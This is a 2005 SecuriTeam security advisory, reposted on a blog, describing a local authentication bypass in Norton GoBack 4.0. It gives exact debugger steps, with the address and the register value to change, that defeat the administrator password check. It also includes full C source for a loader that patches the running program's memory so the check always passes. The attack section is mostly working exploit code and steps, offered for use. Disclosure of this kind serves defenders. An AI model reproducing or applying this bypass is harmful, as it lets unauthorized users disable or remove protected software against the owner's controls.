Search This Blog

Monday, August 01, 2005

[NT] Norton GoBack Local Authentication Bypass

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Norton GoBack Local Authentication Bypass
------------------------------------------------------------------------

SUMMARY

<http://www.symantec.com/goback/> Norton GoBack has "the ability to
backup and restore changes made in your partitions. Whenever a mistake is
done, such as caused by a virus infection, you can use the program to
reset the partition to its original state".

A vulnerability recently discovered in Norton GoBack allows local users to
to bypass authentication password used to limit the usage of the product
by unauthorized users.

DETAILS

Vulnerable Systems:
* Norton GoBack version 4.0

Norton GoBack has an authenticate mechanism to protect itself. The
following steps allows setting all authentication control rules to "none".

1. Run OllyDbg, open file GBOption.exe in "%Program Files%\Norton GoBack".
This is the program that Norton Goback use to change setting.

2. Run program in OllyDbg by pressing F9. A windows with title "Norton
GoBack Options" appears. Choose 2nd tab, click "Change Level...". It will
show a window to change level for each action: enable/disable, uninstall,
autobackup... There are three level: ADMIN, USER and NONE. By default, the
level for uninstall is ADMIN, mean that you must have administrator pass
to uninstall it. After changing level for these action to NONE and click
OK, it requires ADMIN pass to authenticate (eventually, when you've set
pass before). But here we don't have it now (lost, forget.. :D), so we
will bypass it.

3. Return to OllyDbg, jump to address 0x0043697D by pressing Ctrl+G, enter
address in it & click OK. OllyDbg will change to this address, you can see
these code:

00436970 > 8B0D A8964700 MOV ECX,DWORD PTR DS:[4796A8]
00436976 . 50 PUSH EAX
00436977 . 51 PUSH ECX
00436978 . E8 93E9FFFF CALL GBOption.00435310
0043697D . 83C4 08 ADD ESP,8
00436980 . 85C0 TEST EAX,EAX ; eax == 0 if pwd is correct!
00436982 . 0F954424 0F SETNE BYTE PTR SS:[ESP+F]

Notes in addr 0x00436978, this is the function that GoBack uses to check
administrator pass. It will return true if password correct or false if
password is incorrect (eventually). Because we don't have password, this
function will certainly return false. So we will set breakpoint in address
0x0043697D to change its return value: make sure the pointer is at
0x0043697D, press F2 to set breakpoint (the line will change to red).

4. Enter any pass you want & bypass Return to Norton GoBack Options, click
OK, it will ask the ADMIN pass, you enter anything you want & press OK.
Now, the control is changed to OllyDgb, it run to address where I set
breakpoint and paused. Look in the registers window of OllyDbg, you'll see
EAX = 0x00000090. Double click to it, change EAX to 0x00000000 and press
F9 to continue. Now you'll see that no warning message were poped. All
settings you made have been saved. You can check it again by click in
"Change Level.." to see the result.

5. Last action Now, after changing all action level to NONE, you can do
anything with Norton GoBack without worry about asking ADMIN pass. You can
enable/disable it, uninstall it... Good luck!

Automatic loader:
/*
* AUTHOR: LightPhoenix
* EMAIL: light.phoenix@gmail.com
* DATE: 07/20/2005
*
* DESCRIPTION:
* This loader is used in bypassing admin password
* of Norton GoBack 4.0
*
* TODO:
* Patch in memory at @0x436980
* Origin: 0x85,0xC0,0x0F,0x95,0x44,0x24,0x0F
* Patch: 0x33,0xC0,0xC6,0x44,0x24,0x0F,0x00
*/

// Goback Loader.cpp
#include <windows.h>

LPTSTR strExecFile = TEXT("GBOptions.exe");

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
HANDLE hFile;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));

//Find GBOptions.exe
if( (hFile = CreateFile(strExecFile, 0, FILE_SHARE_READ, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL) ) == INVALID_HANDLE_VALUE)
{
MessageBox(0, "GBOptions.exe does not exist", "Bypass Norton GoBack
4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
return -1;
}
CloseHandle(hFile);

//createprocess with suspend
if( CreateProcess(NULL, strExecFile, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si, &pi) == FALSE)
{
MessageBox(0, "Error executing GBOptions.exe", "Bypass Norton GoBack
4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
return -1;
}
//patching
BYTE buf[10];
DWORD bytesRead, bytesWritten;
ReadProcessMemory(pi.hProcess, (LPVOID)0x436980, buf, 7, &bytesRead);

//Compare origin bytes
if( buf[0] == 0x85 && buf[1] == 0xC0 && buf[2] == 0x0F && buf[3] == 0x95
&&
buf[4] == 0x44 && buf[5] == 0x24 && buf[6] == 0x0F )
{
//Correct!
BYTE newData[] = {0x33, 0xC0, 0xC6, 0x44, 0x24, 0x0F, 0x00};
WriteProcessMemory(pi.hProcess, (LPVOID)0x436980, newData,
sizeof(newData) /sizeof(newData[0]), &bytesWritten);

//resume
ResumeThread(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
MessageBox(0, "Bypass succesfully!", "Bypass Norton GoBack 4.0 by
LightPhoenix[light.phoenix@gmail.com]", MB_ICONINFORMATION);
}
else
{
//Failed
MessageBox(0, "Wrong size???\nWrong version!", "Bypass Norton GoBack
4.0 by LightPhoenix[light.phoenix@gmail.com]", MB_ICONERROR);
TerminateProcess(pi.hProcess, 0);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:light.phoenix@gmail.com>
LightPhoenix.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: